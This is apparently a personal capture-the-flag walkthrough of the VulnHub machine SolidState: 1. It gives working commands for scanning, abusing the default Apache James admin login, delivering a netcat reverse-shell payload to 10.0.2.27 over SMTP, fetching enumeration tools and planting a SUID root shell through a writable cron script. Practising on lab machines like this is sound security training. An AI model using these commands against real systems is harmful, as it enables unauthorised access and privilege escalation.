VulnHub: SOLIDSTATE: 1

Link: https://www.vulnhub.com/entry/solidstate-1,261/

1. Network Discovery

2. Port scan

nmap -Pn 10.0.2.25
namp -Pn -p1000- 10.0.2.25

3. OS and service scan

nmap -A -p22,25,80,110,119,4555 10.0.2.25

4. Vuln scan

nmap --script vuln -p22,25,80,110,119,4555 10.0.2.25

5. Starting w/ port 80

Nikto

nikto -h http://10.0.2.25

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.25/ -x php,txt,html,sh,cgi -q

Access the site

View page source, nothing

services.html

Try XXS, but nothing happened.

Maybe some username?

6. Next one is port 25: JAMES smtpd 2.3.2.

I came across this guide

Exploiting Apache James 2.3.2

telnet 10.0.2.25 4555
Username: root
Password: root

HELP

listusers

I changed all password

setpassword <username> 1234

Access these account w/ pop3 service on port 110 using thunderbird

John: there’s a message

Mindy: there’re 2 messages.

I have mindy username and password to login to ssh.

7. login w/ mindy’s credential

ssh mindy@10.0.2.25

ls -la
cat user.txt

Try exploring system

cd ..

Restricted

Read passwd

cat /etc/passwd

I’m restricted because of rbash, cannot do anything

8. James 2.3.2: Get ack to exploitation guide

Follow the guide

adduser ../../../../../../../../etc/bash_completion.d password

I have to supply the reverse shell command

Prepare listener on port 443

rlwrap nc -lvp 443

Connect to port 25

telnet 10.0.2.25 25

Following the guide and using reverse shell cheatsheet

Reverse Shell Cheat Sheet

EHLO bla.bla
MAIL FROM: <'you@domain.com>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
From: bla.bla
'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f
.

Login w/ mindy again, you will see some weird stuff.

ssh mindy@10.0.2.25

Back to listener, now I have a shell

whoami

8. Privilege escalation

I need TTY shell.

python -c 'import pty;pty.spawn("/bin/bash");'

I want to run LinEnum.sh

Prepare SimpleHTTPServer on attacker machine

python -m SimpleHTTPServer 80

Download the script

cd /tmp
wget http://10.0.2.27/LinEnum.sh

Chnage permission and run

chmod 777 LinEnum.sh
/tmp/LinEnum.sh -t

The machine is 32-bit.

There’s /opt/tmp/py -> very interesting

Cannot do anything with these files

Noting on SUID/SGID

Nothing on cron

Verify sudo

sudo -l

No command

Verify capabilities

getcap -r / 2>/dev/null

Let’s check some services beside cron job

ps aux | grep "^root"

I found this ‘cron -f’. There must have something running in the background.

Observe system w/ pspy

DominicBreuker/pspy

This machine is 32-bit. I will download pspy32 to the machine.

wget http://10.0.2.27/pspy32
chmod 777 pspy 32
/tmp/pspy32

Wait for observation and I got this. It’s that ‘/opt/tmp.py’.

Read the file.

cd /opt
cat tmp.py

I can append the script w/ this command to get root shell.

echo 'os.system("cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash")' >> tmp.py
cat tmp.py

Waiting for a while

cd /tmp
ls -la

Now I got /tmp/rootbash

Run it

/tmp/rootbash -p
whoami

Now I’m root

Get root.txt

cd /root
ls -la
cat root.txt